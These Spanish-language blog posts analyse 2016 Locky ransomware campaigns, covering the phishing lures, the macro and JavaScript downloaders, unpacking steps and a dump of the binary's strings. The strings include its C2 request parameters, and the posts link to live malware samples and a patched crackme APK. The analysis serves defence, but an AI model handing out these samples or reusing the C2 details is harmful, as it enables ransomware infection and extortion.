<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">We install and run it.... but we'll look at that next time.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">I'm leaving you the original apk, the patched apk and the .SMALI files so that you can do it yourselves at home.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/CrackMeBabe.7z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Next installment before the end of the year :D</span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fefdfa; color: #333333;">That's all for now @Dkavalanche 2016 </span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<br />
<br />
<br />
<br />
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-17133376332467427442016-05-04T10:14:00.000-07:002016-05-04T10:14:10.584-07:00<b style="background-color: white; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Ransomware Campaign: Locky - Part III</b><br style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;" /><b style="background-color: white; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></b><span style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;"></span><span style="background-color: white;"><span style="color: #222222; font-family: arial, helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">New campaign, this time using a .docm document, which is a Microsoft Word document with macros.</span></span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaqc3QBemJalJlVCCAN5Ax0oW4GQ0erx44Oo4zpV-Au-rzl7UU33-aGu6GhgsTe61NPqyNQwqWpX6TN2VNKL90JyLOkoEWPU7jKEK9_NcWdz9tTXQKsfccOz3qSg4lnfYpcnDcahLvyXk/s1600/fake.jpg" imageanchor="1"><img border="0" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaqc3QBemJalJlVCCAN5Ax0oW4GQ0erx44Oo4zpV-Au-rzl7UU33-aGu6GhgsTe61NPqyNQwqWpX6TN2VNKL90JyLOkoEWPU7jKEK9_NcWdz9tTXQKsfccOz3qSg4lnfYpcnDcahLvyXk/s640/fake.jpg" width="640" /></a></span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="color: #222222; font-family: arial, helvetica, sans-serif;"><span style="background-color: white; font-size: 13px; line-height: 18.2px;">El Indice de detecciones del documento es muy baja.</span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7UvbA6uJsr39437y5YAvcxXI4TCShFtfyNFViD-8XZS9T5isTBdqVWJLa3Crc4FVU3T7B3KByOeaWHNJcflYEsnu8KQ5HOFBA1zt0cXlLPl5ozW1QJMuWpBkhZPLZuiTezbgLudS1Ib4/s1600/vt.jpg" imageanchor="1"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7UvbA6uJsr39437y5YAvcxXI4TCShFtfyNFViD-8XZS9T5isTBdqVWJLa3Crc4FVU3T7B3KByOeaWHNJcflYEsnu8KQ5HOFBA1zt0cXlLPl5ozW1QJMuWpBkhZPLZuiTezbgLudS1Ib4/s640/vt.jpg" width="640" /></a></span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Al habilitar las macros en el docm, se produce la descarga e infección de la computadora.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha7sQGmYaG74Lo2owtphD8Ezeu_nx2yNnrJVCGrcbTe11jtjQcBBJIYk1eyhDqLv6gvf95KGuk16C6oNYweQeGwK783wt6wfD3RkTO8EpXtMFTE12KLx685Pe-Qz7Iunsjgr4x_eY18ng/s1600/01.jpg" imageanchor="1"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha7sQGmYaG74Lo2owtphD8Ezeu_nx2yNnrJVCGrcbTe11jtjQcBBJIYk1eyhDqLv6gvf95KGuk16C6oNYweQeGwK783wt6wfD3RkTO8EpXtMFTE12KLx685Pe-Qz7Iunsjgr4x_eY18ng/s640/01.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Desempaquetado de la capa de ofuscación (crypter del binario)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">https://virustotal.com/es/file/ed8390885a6bcdda11cb51f8d3c2553625d1c567f221a490450f44d2ac3cec3a/analysis/</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">BP en IsDebuggerPresent /ResumeThread/WriteProcessMemory y luego dumpear con Pe-TOOL</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh27AupXeW2jHdIJZxxlfg_a0LfKnwqnQ35ue8XFjh8BhZQsQXugbxS3VZsL3f3h16GgVNra8F7WNpqr1iA26FE02LuiyM8qedmdTLC74zoSsRUJ7VMMUN0_-Xf60F2Q-luur7h9lvh25E/s1600/02.jpg" imageanchor="1"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh27AupXeW2jHdIJZxxlfg_a0LfKnwqnQ35ue8XFjh8BhZQsQXugbxS3VZsL3f3h16GgVNra8F7WNpqr1iA26FE02LuiyM8qedmdTLC74zoSsRUJ7VMMUN0_-Xf60F2Q-luur7h9lvh25E/s640/02.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Locky...</span><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpWuqbWQSo8ewOXsc3q8ROwUCYEq459NO_I0FiuWQ4NIRQ5UQcLdHbLsC7WnZ9BBnQUCTUKpb-suEkQBeB2gelGScF1YB09AZt-MnHqlmRU4EF1LxjEVbiPYGcqxHTpVwxohVLkyZZYc/s1600/locky.jpg" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpWuqbWQSo8ewOXsc3q8ROwUCYEq459NO_I0FiuWQ4NIRQ5UQcLdHbLsC7WnZ9BBnQUCTUKpb-suEkQBeB2gelGScF1YB09AZt-MnHqlmRU4EF1LxjEVbiPYGcqxHTpVwxohVLkyZZYc/s640/locky.jpg" width="640" /></a><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exenciones de archivo que busca para cifrar.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8y1o6QviH8ma2R0B3O05rSVzPBgYZy9x0zcgZniZcEYXIPWCHshjsBm33pMjMQJbBzTuJHGB1zp1sYa15RBy1HPJ18arItDcG97e654Ad_FHlBKfn5XRvgz9AkzzeN_92do5Evxk8at4/s1600/03.jpg" imageanchor="1"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8y1o6QviH8ma2R0B3O05rSVzPBgYZy9x0zcgZniZcEYXIPWCHshjsBm33pMjMQJbBzTuJHGB1zp1sYa15RBy1HPJ18arItDcG97e654Ad_FHlBKfn5XRvgz9AkzzeN_92do5Evxk8at4/s640/03.jpg" width="640" /></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Probando el binario en forma dinámica.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Conexión con el C&C, eh visto que si no hay conexión a Internet o no puede encontrar vía dns los sitios de C&C, Locky no comienza con el proceso de cifrado de la PC.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztvcARr0azDo7qrSFEKgFXEGh9bfARxwLQhv2xq1UMXkNGp78wYkVtjIAofJw6bsZ5_5UfngsldZDEenNtUQpO4PXqNivX7IHe1VHUhyIFngFcbM-Ba-3XIR9U4RXJ8mci126nXbxLU4/s1600/05.jpg" imageanchor="1"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztvcARr0azDo7qrSFEKgFXEGh9bfARxwLQhv2xq1UMXkNGp78wYkVtjIAofJw6bsZ5_5UfngsldZDEenNtUQpO4PXqNivX7IHe1VHUhyIFngFcbM-Ba-3XIR9U4RXJ8mci126nXbxLU4/s640/05.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">El infame cartel de que nuestros datos fueron cifrados.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDLgkRjwvPrB6bR0A7RUDTciKWfuMlj80f8mtc9zBK_OJI4qtlOZCNh2zXYcifWmlTNS0No2YBo1kf5blsJVUiJxBIa0mmVP2fVlIbcde08st7H3nJ6DrSUwxpwaSMKPm5P_39qwT6YB8/s1600/04.jpg" imageanchor="1"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDLgkRjwvPrB6bR0A7RUDTciKWfuMlj80f8mtc9zBK_OJI4qtlOZCNh2zXYcifWmlTNS0No2YBo1kf5blsJVUiJxBIa0mmVP2fVlIbcde08st7H3nJ6DrSUwxpwaSMKPm5P_39qwT6YB8/s640/04.jpg" width="640" /></a><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Muestras: https://www.dropbox.com/s/105s5umnmpm8cj8/Locky-03-05-16.zip?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento @Dkavalanche 2016</span><br />
<br />
<br />
<b style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Ransomware Campaign: Locky - Part II</b><br />
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Published 2016-03-10.</span><br />
<b style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></b>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Continúan con las campañas de infección en forma masiva, esta vez el Ransomware se encuentra alojado en un servidor nacional demostrando que esta amenaza llego para quedarse y atacar a usuarios de Argentina.</span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Asunto: : Shipping Information - Your Order #396-7972</span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span>
<br />
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Dear Customer,<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Your order will be shipped shortly, we apologize for the
troubles. Please, review the invoice in the attached file.<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<br /></div>
<br />
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Sincerely,<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i><br /></i></span></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Xxxxx..</i></span></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
<br /></div>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlLnVNRVNTR9d8jA88TncCcLaEiwT-RgYEV-UixZUdv6Ny9t8Lka0TXKJFqxAUWjY6KlqetvH1abR07yQn3WnoRfQWspEb3dlnop4MnEn_8lF84y5LSYm4vv1dGUcf869_WrKmNDuQYN0/s1600/fake2.jpg" imageanchor="1"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlLnVNRVNTR9d8jA88TncCcLaEiwT-RgYEV-UixZUdv6Ny9t8Lka0TXKJFqxAUWjY6KlqetvH1abR07yQn3WnoRfQWspEb3dlnop4MnEn_8lF84y5LSYm4vv1dGUcf869_WrKmNDuQYN0/s640/fake2.jpg" width="640" /></a></span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">JavaScript downloader ofuscado dentro de un archivo .zip</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwi1JzOf3NlqmskNDspCyLMUybvtKfifBWgMNCQ2yt5Eoc592AeJCEqMNwsVYusGrV-2Z-1S70r-d7nbOLXz9S7WnK4b5oI_zSn2p5j0GyBcASPgXw0I22ZE1ufzN8M2PKop7-wavZS3Q/s1600/javascript.jpg" imageanchor="1"><img border="0" height="14" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwi1JzOf3NlqmskNDspCyLMUybvtKfifBWgMNCQ2yt5Eoc592AeJCEqMNwsVYusGrV-2Z-1S70r-d7nbOLXz9S7WnK4b5oI_zSn2p5j0GyBcASPgXw0I22ZE1ufzN8M2PKop7-wavZS3Q/s640/javascript.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s1600/001.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s640/001.jpg" width="640" /></a><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Trafico de red de la descarga.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Icono del malware Descargado</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6u6OESemLML00iiTwR-sCEMBLAIXIwRCW1-80v9x8_K4BzrU15W8fiGMYTZ9UjhHtLnywbXkRwTjb-JcIZEl2H5iyUanYP-Jjy_c7aSH33ePZQ_L9RIV-O_kFgW9hCuuqlSdz_dFK1A/s1600/icono.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6u6OESemLML00iiTwR-sCEMBLAIXIwRCW1-80v9x8_K4BzrU15W8fiGMYTZ9UjhHtLnywbXkRwTjb-JcIZEl2H5iyUanYP-Jjy_c7aSH33ePZQ_L9RIV-O_kFgW9hCuuqlSdz_dFK1A/s400/icono.jpg" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Baja detección por parte de los Antivirus.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eOyv8TUlZSy3oABMwR5HwEqEZaSSJ4asSrmVx2BFmPNuchSYwKRVRXt2xXu2AS5FOh8ZFUVxcoqt2qYZhrpT_3PXd4B4R2CD6MbJwKCHY-r-M9tcwu8QuZ4uFN5fwUVdOxl14LzfqBY/s1600/VT.jpg" imageanchor="1"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eOyv8TUlZSy3oABMwR5HwEqEZaSSJ4asSrmVx2BFmPNuchSYwKRVRXt2xXu2AS5FOh8ZFUVxcoqt2qYZhrpT_3PXd4B4R2CD6MbJwKCHY-r-M9tcwu8QuZ4uFN5fwUVdOxl14LzfqBY/s640/VT.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">El binario tiene una capa de Cripter igual al caso anterior, con un Bp en ResumeThread y dumpeando con PEtools obtenemos la muestra limpia.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEotSfQEwFMFLAYJ84wxwky0L5wwDDS48BE539bCmk_nSUoDTGDBdu9PWS26Rzttcc_NCBL3FfQ55HN0zHLKJpO6UfkpbzRmgiqULOARzcOLH1_0Ij5R5VL_EkMSD6SAtfUwDvgLZ1E/s1600/dump.jpg" imageanchor="1"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEotSfQEwFMFLAYJ84wxwky0L5wwDDS48BE539bCmk_nSUoDTGDBdu9PWS26Rzttcc_NCBL3FfQ55HN0zHLKJpO6UfkpbzRmgiqULOARzcOLH1_0Ij5R5VL_EkMSD6SAtfUwDvgLZ1E/s640/dump.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Strings</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Text strings referenced in Dumped:.text</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Address Disassembly Text string</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004019CA MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401B09 PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401B78 PUSH Dumped.004138C4 UNICODE ".tmp"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401D8D PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00401DF0 PUSH Dumped.004138F4 UNICODE ".locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040253B PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040255A PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402607 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402687 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402763 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402832 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004028C4 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402AE8 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402B64 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402D2E ASCII "L~",0</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00402D85 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403174 PUSH Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040326D PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403281 PUSH Dumped.004139A8 ASCII "&act=stats&path="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032A8 PUSH Dumped.0041399C ASCII "&encrypted="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032D2 PUSH Dumped.00413990 ASCII "&failed="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004032F9 PUSH Dumped.00413984 ASCII "&length="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403575 MOV EDI,Dumped.004139C0 ASCII "Windows 2000"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403599 MOV EDI,Dumped.004139D0 ASCII "Windows XP"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035A7 MOV EDI,Dumped.004139DC ASCII "Windows 2003"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035B1 MOV EDI,Dumped.004139EC ASCII "Windows 2003 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035D3 MOV EDI,Dumped.004139FC ASCII "Windows Vista"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035DA MOV EDI,Dumped.00413A0C ASCII "Windows Server 2008"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035EA MOV EDI,Dumped.00413A20 ASCII "Windows 7"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004035F1 MOV EDI,Dumped.00413A2C ASCII "Windows Server 2008 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403602 MOV EDI,Dumped.00413A44 ASCII "Windows 8"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403609 MOV EDI,Dumped.00413A50 ASCII "Windows Server 2012"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040361A MOV EDI,Dumped.00413A64 ASCII "Windows 8.1"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403621 MOV EDI,Dumped.00413A70 ASCII "Windows Server 2012 R2"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040363E MOV EDI,Dumped.00413A88 ASCII "Windows 10"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403645 MOV EDI,Dumped.00413A94 ASCII "Windows Server 2016 Technical Preview"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040364C MOV EDI,Dumped.00413ABC ASCII "unknown"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004036C5 PUSH Dumped.00413CF4 ASCII "IsWow64Process"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004036CA PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040376F PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040377E PUSH Dumped.00413AF4 ASCII "&act=getkey&affid="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037A5 PUSH Dumped.00413AEC ASCII "&lang="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037CB PUSH Dumped.00413AE4 ASCII "&corp="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004037F7 PUSH Dumped.00413ADC ASCII "&serv="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403820 PUSH Dumped.00413AD4 ASCII "&os="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403847 PUSH Dumped.00413ACC ASCII "&sp="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040386E PUSH Dumped.00413AC4 ASCII "&x64="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403A33 PUSH Dumped.00413B08 ASCII "Tahoma"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403DB4 MOV DWORD PTR SS:[ESP],Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403DC5 PUSH Dumped.00413B10 UNICODE "\_Locky_recover_instructions.bmp"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403E75 PUSH Dumped.00413B54 ASCII "Control Panel\Desktop"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403F17 MOV ECX,Dumped.00413B70 ASCII "WallpaperStyle"</span><br />
